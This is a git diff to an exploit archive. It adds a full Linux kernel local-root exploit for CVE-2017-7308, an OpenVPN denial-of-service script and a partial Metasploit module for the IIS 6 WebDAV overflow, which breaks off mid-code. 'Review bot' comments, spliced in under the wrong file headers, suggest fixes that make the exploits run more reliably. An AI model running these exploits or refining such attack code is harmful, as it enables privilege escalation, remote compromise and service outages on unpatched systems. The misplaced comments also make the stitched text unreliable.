diff --git a/files.csv b/files.csv
index 5d296f62e..95b9851b8 100644
--- a/files.csv
+++ b/files.csv
@@ -5490,6 +5490,7 @@ id,file,description,date,author,platform,type,port
 41983,platforms/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflows",2017-05-09,"Google Security Research",android,dos,0
 41984,platforms/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,multiple,dos,0
 41991,platforms/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap-Based Buffer Overflow",2017-05-10,"Core Security",linux,dos,0
+41993,platforms/multiple/dos/41993.py,"OpenVPN 2.4.0 - Unauthenticated Denial of Service",2017-05-11,QuarksLab,multiple,dos,1194
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8295,7 +8296,7 @@ id,file,description,date,author,platform,type,port
 31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,linux,local,0
 31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
 31346,platforms/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)",2014-02-02,saelo,linux,local,0
-31347,platforms/lin_x86/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86,local,0
+31347,platforms/lin_x86-64/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Privilege Escalation (3)",2014-02-02,rebel,lin_x86-64,local,0
 31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
 31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0
 31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0
@@ -8978,6 +8979,7 @@ id,file,description,date,author,platform,type,port
 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
+41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15467,7 +15469,7 @@ id,file,description,date,author,platform,type,port
 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
-41987,platforms/windows/remote/41987.c,"Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
+41987,platforms/windows/remote/41987.py,"Microsoft Windows - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
 41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
 41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
@@ -15496,6 +15498,7 @@ id,file,description,date,author,platform,type,port
 41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0
 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0
 41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80
+41992,platforms/windows/remote/41992.rb,"Microsoft IIS WebDav - ScStoragePathFromUrl Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
diff --git a/platforms/lin_x86/local/31347.c b/platforms/lin_x86-64/local/31347.c
similarity index 100%
rename from platforms/lin_x86/local/31347.c
rename to platforms/lin_x86-64/local/31347.c
diff --git a/platforms/linux/local/41994.c b/platforms/linux/local/41994.c
new file mode 100755
index 000000000..05328d5da
--- /dev/null
+++ b/platforms/linux/local/41994.c
@@ -0,0 +1,497 @@
+// A proof-of-concept local root exploit for CVE-2017-7308.
+// Includes a SMEP & SMAP bypass.
+// Tested on 4.8.0-41-generic Ubuntu kernel.
+// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308
+//
+// Usage:
+// user@ubuntu:~$ uname -a
+// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...
+// user@ubuntu:~$ gcc pwn.c -o pwn
+// user@ubuntu:~$ ./pwn
+// [.] starting
+// [.] namespace sandbox set up
+// [.] KASLR bypass enabled, getting kernel addr
+// [.] done, kernel text: ffffffff87000000
+// [.] commit_creds: ffffffff870a5cf0
+// [.] prepare_kernel_cred: ffffffff870a60e0
+// [.] native_write_cr4: ffffffff87064210
+// [.] padding heap
+// [.] done, heap is padded
+// [.] SMEP & SMAP bypass enabled, turning them off
+// [.] done, SMEP & SMAP should be off now
+// [.] executing get root payload 0x401516
+// [.] done, should be root now
+// [.] checking if we got root
+// [+] got r00t ^_^
+// root@ubuntu:/home/user# cat /etc/shadow
+// root:!:17246:0:99999:7:::
+// daemon:*:17212:0:99999:7:::
+// bin:*:17212:0:99999:7:::
+// ...
+//
+// Andrey Konovalov
+
+#define _GNU_SOURCE
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define ENABLE_KASLR_BYPASS 1
+#define ENABLE_SMEP_SMAP_BYPASS 1
+
+// Will be overwritten if ENABLE_KASLR_BYPASS
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Kernel symbol offsets
+#define COMMIT_CREDS 0xa5cf0ul
+#define PREPARE_KERNEL_CRED 0xa60e0ul
+#define NATIVE_WRITE_CR4 0x64210ul
+
+// Should have SMEP and SMAP bits disabled
+#define CR4_DESIRED_VALUE 0x407f0ul
+
+#define KMALLOC_PAD 512
+#define PAGEALLOC_PAD 1024
+
+// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
+
+typedef uint32_t u32;
+
+// $ pahole -C hlist_node ./vmlinux
+struct hlist_node {
+ struct hlist_node * next; /* 0 8 */
+ struct hlist_node * * pprev; /* 8 8 */
+};
+
+// $ pahole -C timer_list ./vmlinux
+struct timer_list {
+ struct hlist_node entry; /* 0 16 */
+ long unsigned int expires; /* 16 8 */
+ void (*function)(long unsigned int); /* 24 8 */
+ long unsigned int data; /* 32 8 */
+ u32 flags; /* 40 4 */
+ int start_pid; /* 44 4 */
+ void * start_site; /* 48 8 */
+ char start_comm[16]; /* 56 16 */
+};
+
+// packet_sock->rx_ring->prb_bdqc->retire_blk_timer
+#define TIMER_OFFSET 896
+
+// pakcet_sock->xmit
+#define XMIT_OFFSET 1304
+
+// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
+
+void packet_socket_rx_ring_init(int s, unsigned int block_size,
+ unsigned int frame_size, unsigned int block_nr,
+ unsigned int sizeof_priv, unsigned int timeout) {
+ int v = TPACKET_V3;
+ int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
+ if (rv < 0) {
+ perror("[-] setsockopt(PACKET_VERSION)");
+ exit(EXIT_FAILURE);
+ }
+
+ struct tpacket_req3 req;
+ memset(&req, 0, sizeof(req));
+ req.tp_block_size = block_size;
+ 
req.tp_frame_size = frame_size;
+ req.tp_block_nr = block_nr;
+ req.tp_frame_nr = (block_size * block_nr) / frame_size;
+ req.tp_retire_blk_tov = timeout;
+ req.tp_sizeof_priv = sizeof_priv;
+ req.tp_feature_req_word = 0;
+
+ rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
+ if (rv < 0) {
+ perror("[-] setsockopt(PACKET_RX_RING)");
+ exit(EXIT_FAILURE);
+ }
+}
+
+int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
+ unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
+ int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
+ if (s < 0) {
+ perror("[-] socket(AF_PACKET)");
+ exit(EXIT_FAILURE);
+ }
+
+ packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
+ sizeof_priv, timeout);
+
+ struct sockaddr_ll sa;
+ memset(&sa, 0, sizeof(sa));
+ sa.sll_family = PF_PACKET;
+ sa.sll_protocol = htons(ETH_P_ALL);
+ sa.sll_ifindex = if_nametoindex("lo");
+ sa.sll_hatype = 0;
+ sa.sll_pkttype = 0;
+ sa.sll_halen = 0;
+
+ int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
+ if (rv < 0) {
+ perror("[-] bind(AF_PACKET)");
+ exit(EXIT_FAILURE);
+ }
+
+ return s;
+}
+
+void packet_socket_send(int s, char *buffer, int size) {
+ struct sockaddr_ll sa;
+ memset(&sa, 0, sizeof(sa));
+ sa.sll_ifindex = if_nametoindex("lo");
+ sa.sll_halen = ETH_ALEN;
+
+ if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,
+ sizeof(sa)) < 0) {
+ perror("[-] sendto(SOCK_RAW)");
+ exit(EXIT_FAILURE);
+ }
+}
+
+void loopback_send(char *buffer, int size) {
+ int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
+ if (s == -1) {
+ perror("[-] socket(SOCK_RAW)");
+ exit(EXIT_FAILURE);
+ }
+
+ packet_socket_send(s, buffer, size);
+}
+
+int packet_sock_kmalloc() {
+ int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
+ if (s == -1) {
+ perror("[-] socket(SOCK_DGRAM)");
+ exit(EXIT_FAILURE);
+ }
+ return s;
+}
+
+void packet_sock_timer_schedule(int s, int timeout) {
+ packet_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);
+}
+
+void 
packet_sock_id_match_trigger(int s) { + char buffer[16]; + packet_socket_send(s, &buffer[0], sizeof(buffer)); +} + +// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * * + +#define ALIGN(x, a) __ALIGN_KERNEL((x), (a)) +#define __ALIGN_KERNEL(x, a) __ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1) +#define __ALIGN_KERNEL_MASK(x, mask) (((x) + (mask)) & ~(mask)) + +#define V3_ALIGNMENT (8) +#define BLK_HDR_LEN (ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT)) + +#define ETH_HDR_LEN sizeof(struct ethhdr) +#define IP_HDR_LEN sizeof(struct iphdr) +#define UDP_HDR_LEN sizeof(struct udphdr) + +#define UDP_HDR_LEN_FULL (ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN) + +int oob_setup(int offset) { + unsigned int maclen = ETH_HDR_LEN; + unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN + + (maclen < 16 ? 16 : maclen)); + unsigned int macoff = netoff - maclen; + unsigned int sizeof_priv = (1u<<31) + (1u<<30) + + 0x8000 - BLK_HDR_LEN - macoff + offset; + return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100); +} + +void oob_write(char *buffer, int size) { + loopback_send(buffer, size); +} + +void oob_timer_execute(void *func, unsigned long arg) { + oob_setup(2048 + TIMER_OFFSET - 8); + + int i; + for (i = 0; i < 32; i++) { + int timer = packet_sock_kmalloc(); + packet_sock_timer_schedule(timer, 1000); + } + + char buffer[2048]; + memset(&buffer[0], 0, sizeof(buffer)); + + struct timer_list *timer = (struct timer_list *)&buffer[8]; + timer->function = func; + timer->data = arg; + timer->flags = 1; + + oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2); + + sleep(1); +} + +void oob_id_match_execute(void *func) { + int s = oob_setup(2048 + XMIT_OFFSET - 64); + + int ps[32]; + + int i; + for (i = 0; i < 32; i++) + ps[i] = packet_sock_kmalloc(); + + char buffer[2048]; + memset(&buffer[0], 0, 2048); + + void **xmit = (void **)&buffer[64]; + *xmit = func; + + oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2); + + for (i = 0; i < 32; i++) + 
packet_sock_id_match_trigger(ps[i]);
+}
+
+// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
+
+void kmalloc_pad(int count) {
+ int i;
+ for (i = 0; i < count; i++)
+ packet_sock_kmalloc();
+}
+
+void pagealloc_pad(int count) {
+ packet_socket_setup(0x8000, 2048, count, 0, 100);
+}
+
+// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
+
+typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+
+void get_root_payload(void) {
+ ((_commit_creds)(KERNEL_BASE + COMMIT_CREDS))(
+ ((_prepare_kernel_cred)(KERNEL_BASE + PREPARE_KERNEL_CRED))(0)
+ );
+}
+
+// * * * * * * * * * * * * * Simple KASLR bypass * * * * * * * * * * * * * * *
+
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+unsigned long get_kernel_addr() {
+ int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+ if (size == -1) {
+ perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)");
+ exit(EXIT_FAILURE);
+ }
+
+ size = (size / getpagesize() + 1) * getpagesize();
+ char *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,
+ MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+ size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);
+ if (size == -1) {
+ perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)");
+ exit(EXIT_FAILURE);
+ }
+
+ const char *needle1 = "Freeing SMP";
+ char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));
+ if (substr == NULL) {
+ fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle1);
+ exit(EXIT_FAILURE);
+ }
+
+ for (size = 0; substr[size] != '\n'; size++);
+
+ const char *needle2 = "ffff";
+ substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));
+ if (substr == NULL) {
+ fprintf(stderr, "[-] substring '%s' not found in dmesg\n", needle2);
+ exit(EXIT_FAILURE);
+ }
+
+ char *endptr = &substr[16];
+ unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+ 
r &= 0xfffffffffff00000ul;
+ r -= 0x1000000ul;
+
+ return r;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+void exec_shell() {
+ char *shell = "/bin/bash";
+ char *args[] = {shell, "-i", NULL};
+ execve(shell, args, NULL);
+}
+
+void fork_shell() {
+ pid_t rv;
+
+ rv = fork();
+ if (rv == -1) {
+ perror("[-] fork()");
+ exit(EXIT_FAILURE);
+ }
+
+ if (rv == 0) {
+ exec_shell();
+ }
+}
+
+bool is_root() {
+ // We can't simple check uid, since we're running inside a namespace
+ // with uid set to 0. Try opening /etc/shadow instead.
+ int fd = open("/etc/shadow", O_RDONLY);
+ if (fd == -1)
+ return false;
+ close(fd);
+ return true;
+}
+
+void check_root() {
+ printf("[.] checking if we got root\n");
+
+ if (!is_root()) {
+ printf("[-] something went wrong =(\n");
+ return;
+ }
+
+ printf("[+] got r00t ^_^\n");
+
+ // Fork and exec instead of just doing the exec to avoid potential
+ // memory corruptions when closing packet sockets.
+ fork_shell();
+}
+
+bool write_file(const char* file, const char* what, ...) 
{
+ char buf[1024];
+ va_list args;
+ va_start(args, what);
+ vsnprintf(buf, sizeof(buf), what, args);
+ va_end(args);
+ buf[sizeof(buf) - 1] = 0;
+ int len = strlen(buf);
+
+ int fd = open(file, O_WRONLY | O_CLOEXEC);
+ if (fd == -1)
+ return false;
+ if (write(fd, buf, len) != len) {
+ close(fd);
+ return false;
+ }
+ close(fd);
+ return true;
+}
+
+void setup_sandbox() {
+ int real_uid = getuid();
+ int real_gid = getgid();
+
+ if (unshare(CLONE_NEWUSER) != 0) {
+ perror("[-] unshare(CLONE_NEWUSER)");
+ exit(EXIT_FAILURE);
+ }
+
+ if (unshare(CLONE_NEWNET) != 0) {
+ perror("[-] unshare(CLONE_NEWUSER)");
+ exit(EXIT_FAILURE);
+ }
+
+ if (!write_file("/proc/self/setgroups", "deny")) {
+ perror("[-] write_file(/proc/self/set_groups)");
+ exit(EXIT_FAILURE);
+ }
+ if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
+ perror("[-] write_file(/proc/self/uid_map)");
+ exit(EXIT_FAILURE);
+ }
+ if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
+ perror("[-] write_file(/proc/self/gid_map)");
+ exit(EXIT_FAILURE);
+ }
+
+ cpu_set_t my_set;
+ CPU_ZERO(&my_set);
+ CPU_SET(0, &my_set);
+ if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
+ perror("[-] sched_setaffinity()");
+ exit(EXIT_FAILURE);
+ }
+
+ if (system("/sbin/ifconfig lo up") != 0) {
+ perror("[-] system(/sbin/ifconfig lo up)");
+ exit(EXIT_FAILURE);
+ }
+}
+
+int main() {
+ printf("[.] starting\n");
+
+ setup_sandbox();
+
+ printf("[.] namespace sandbox set up\n");
+
+#if ENABLE_KASLR_BYPASS
+ printf("[.] KASLR bypass enabled, getting kernel addr\n");
+ KERNEL_BASE = get_kernel_addr();
+ printf("[.] done, kernel text: %lx\n", KERNEL_BASE);
+#endif
+
+ printf("[.] commit_creds: %lx\n", KERNEL_BASE + COMMIT_CREDS);
+ printf("[.] prepare_kernel_cred: %lx\n", KERNEL_BASE + PREPARE_KERNEL_CRED);
+
+#if ENABLE_SMEP_SMAP_BYPASS
+ printf("[.] native_write_cr4: %lx\n", KERNEL_BASE + NATIVE_WRITE_CR4);
+#endif
+
+ printf("[.] 
padding heap\n");
+ kmalloc_pad(KMALLOC_PAD);
+ pagealloc_pad(PAGEALLOC_PAD);
+ printf("[.] done, heap is padded\n");
+
+#if ENABLE_SMEP_SMAP_BYPASS
+ printf("[.] SMEP & SMAP bypass enabled, turning them off\n");
+ oob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);
+ printf("[.] done, SMEP & SMAP should be off now\n");
+#endif
+
+ printf("[.] executing get root payload %p\n", &get_root_payload);
+ oob_id_match_execute((void *)&get_root_payload);
+ printf("[.] done, should be root now\n");
+
+ check_root();
+
+ while (1) sleep(1000);
+
+ return 0;
+}
\ No newline at end of file
diff --git a/platforms/multiple/dos/41993.py b/platforms/multiple/dos/41993.py
new file mode 100755
index 000000000..c08b5ed18
--- /dev/null
+++ b/platforms/multiple/dos/41993.py
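Review bot: The error path for the second `unshare` in `setup_sandbox` reports the wrong call — `perror("[-] unshare(CLONE_NEWUSER)")` is printed when `unshare(CLONE_NEWNET)` fails, and the following block names `/proc/self/set_groups` although the file actually written is `/proc/self/setgroups`; they should read `perror("[-] unshare(CLONE_NEWNET)");` and `perror("[-] write_file(/proc/self/setgroups)");` so a failing run points at the right step. `get_kernel_addr` never compares the `mmap` result with `MAP_FAILED` before handing the buffer to `klogctl`, so an allocation failure turns into a fault rather than a message; `if (buffer == MAP_FAILED) { perror("[-] mmap()"); exit(EXIT_FAILURE); }` after the call fixes that. The header comment should also state the two preconditions the code visibly relies on — unprivileged user namespaces (`unshare(CLONE_NEWUSER)` before the AF_PACKET sockets) and a kernel log readable by the sandboxed process (`klogctl(SYSLOG_ACTION_READ_ALL, ...)`) — since a host that restricts either makes this PoC exit at `setup_sandbox` or `get_kernel_addr`, which is useful to know when assessing exposure.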
@@ -0,0 +1,100 @@ +#!/usr/bin/env python3 +''' +$ ./dos_server.py & +$ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf +... +Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1 +Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf)) +Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error +Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask 255.255.255.0 +Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Closing TUN/TAP interface Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/ifconfig tun0 0.0.0.0 +''' + +import binascii +import os +import socket +from construct import * +HOST, PORT = "192.168.0.1", 1194 + +SessionID = Bytes(8) + +PControlV1 = Struct( + "packet_id" / Int32ub, + "data" / GreedyBytes +) + +PAckV1 = Struct( + "remote_session_id" / SessionID +) + +PControlHardResetClientV2 = Struct( + "packet_id" / Int32ub +) + +PControlHardResetServerV2 = Struct( + "remote_session_id" / SessionID, + "packet_id" / Int32ub +) + +OpenVPNPacket = Struct( + EmbeddedBitStruct( + "opcode" / Enum(BitsInteger(5), + P_CONTROL_HARD_RESET_CLIENT_V1=1, + P_CONTROL_HARD_RESET_SERVER_V1=2, + P_CONTROL_HARD_RESET_CLIENT_V2=7, + P_CONTROL_HARD_RESET_SERVER_V2=8, + P_CONTROL_SOFT_RESET_V1=3, + P_CONTROL_V1=4, + P_ACK_V1=5, + P_DATA_V1=6), + "key_id" / BitsInteger(3) + ), + "session_id" / SessionID, + "ack_packets" / PrefixedArray(Int8ub, Int32ub), + Embedded(Switch(this.opcode, + { + "P_CONTROL_V1": PControlV1, + "P_ACK_V1": PAckV1, + "P_CONTROL_HARD_RESET_CLIENT_V2": PControlHardResetClientV2, + "P_CONTROL_HARD_RESET_SERVER_V2": PControlHardResetServerV2 + })) +) +def main(): + session_id = os.urandom(8) + + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + reset_client = OpenVPNPacket.build({ + "opcode": "P_CONTROL_HARD_RESET_CLIENT_V2", + "key_id": 0, + "session_id": session_id, + "ack_packets": [], + 
"packet_id": 0})
+
+ sock.sendto(reset_client, (HOST, PORT))
+
+ data, addr = sock.recvfrom(8192)
+ reset_server = OpenVPNPacket.parse(data)
+
+ remote_session_id = reset_server.session_id
+
+ # ack server packet
+ ack_packet = OpenVPNPacket.build({
+ "opcode": "P_ACK_V1",
+ "key_id": 0,
+ "session_id": session_id,
+ "ack_packets": [reset_server.packet_id],
+ "remote_session_id": remote_session_id
+ })
+ sock.sendto(ack_packet, (HOST, PORT))
+
+ control_packet = OpenVPNPacket.build({
+ "opcode": "P_CONTROL_V1",
+ "key_id": 0,
+ "session_id": session_id,
+ "ack_packets": [],
+ "packet_id": 1,
+ "data": b"a" * 2048})
+ sock.sendto(control_packet, (HOST, PORT))
+
+if __name__ == '__main__':
+ main()
diff --git a/platforms/windows/remote/41987.c b/platforms/windows/remote/41987.py
similarity index 100%
rename from platforms/windows/remote/41987.c
rename to platforms/windows/remote/41987.py
diff --git a/platforms/windows/remote/41992.rb b/platforms/windows/remote/41992.rb
new file mode 100755
index 000000000..d3dd8ef88
--- /dev/null
+++ b/platforms/windows/remote/41992.rb
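Review bot: `sock.recvfrom(8192)` in `main` has no timeout, so when nothing answers the first datagram the script blocks forever instead of reporting a failure; set one right after the socket is created, `sock.settimeout(5)`, and let the resulting `socket.timeout` propagate. The socket is also never closed and `addr` is never read — `with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:` and `data, _ = sock.recvfrom(8192)` tidy both. `import binascii` at the top of the file is unused, and `from construct import *` hides which construct release the `Embedded`/`EmbeddedBitStruct` helpers come from; as far as I recall later construct releases dropped them, so a one-line comment pinning the version the script was written against would save the next reader a debugging session.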
@@ -0,0 +1,178 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => ' Microsoft IIS WebDav ScStoragePathFromUrl Overflow', + 'Description' => %q{ + Buffer overflow in the ScStoragePathFromUrl function + in the WebDAV service in Internet Information Services (IIS) 6.0 + in Microsoft Windows Server 2003 R2 allows remote attackers to + execute arbitrary code via a long header beginning with + "If: + [ + 'Zhiniang Peng', # Original author + 'Chen Wu', # Original author + 'Dominic Chell ', # metasploit module + 'firefart', # metasploit module + 'zcgonvh ', # metasploit module + 'Rich Whitcroft' # metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2017-7269' ], + [ 'BID', '97127' ], + [ 'URL', 'https://github.com/edwardz246003/IIS_exploit' ], + [ 'URL', 'https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html' ] + ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 2000, + 'BadChars' => "\x00", + 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, + 'DisableNops' => 'True', + 'EncoderOptions' => + { + 'BufferRegister' => 'ESI', + } + }, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'PrependMigrate' => true, + }, + 'Targets' => + [ + [ + 'Microsoft Windows Server 2003 R2 SP2', + { + 'Platform' => 'win', + }, + ], + ], + 'Platform' => 'win', + 'DisclosureDate' => 'Mar 26 2017', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'Path of IIS 6 web application', '/']), + OptInt.new('MINPATHLENGTH', [ true, 'Start of physical path brute force', 3 ]), + OptInt.new('MAXPATHLENGTH', [ true, 'End of physical path brute force', 60 ]), + ]) + end + + def min_path_len + datastore['MINPATHLENGTH'] + 
end
+
+ def max_path_len
+ datastore['MAXPATHLENGTH']
+ end
+
+ def supports_webdav?(headers)
+ if headers['MS-Author-Via'] == 'DAV' ||
+ headers['DASL'] == '' ||
+ headers['DAV'] =~ /^[1-9]+(,\s+[1-9]+)?$/ ||
+ headers['Public'] =~ /PROPFIND/ ||
+ headers['Allow'] =~ /PROPFIND/
+ return true
+ else
+ return false
+ end
+ end
+
+ def check
+ res = send_request_cgi({
+ 'uri' => target_uri.path,
+ 'method' => 'OPTIONS'
+ })
+ if res && res.headers['Server'].include?('IIS/6.0') && supports_webdav?(res.headers)
+ return Exploit::CheckCode::Vulnerable
+ elsif res && supports_webdav?(res.headers)
+ return Exploit::CheckCode::Detected
+ elsif res.nil?
+ return Exploit::CheckCode::Unknown
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+ # extract the local servername and port from a PROPFIND request
+ # these need to be the values from the backend server
+ # if testing a reverse proxy setup, these values differ
+ # from RHOST and RPORT but can be extracted this way
+ vprint_status("Extracting ServerName and Port")
+ res = send_request_raw(
+ 'method' => 'PROPFIND',
+ 'headers' => {
+ 'Content-Length' => 0
+ },
+ 'uri' => target_uri.path
+ )
+ fail_with(Failure::BadConfig, "Server did not respond correctly to WebDAV request") if(res.nil? 
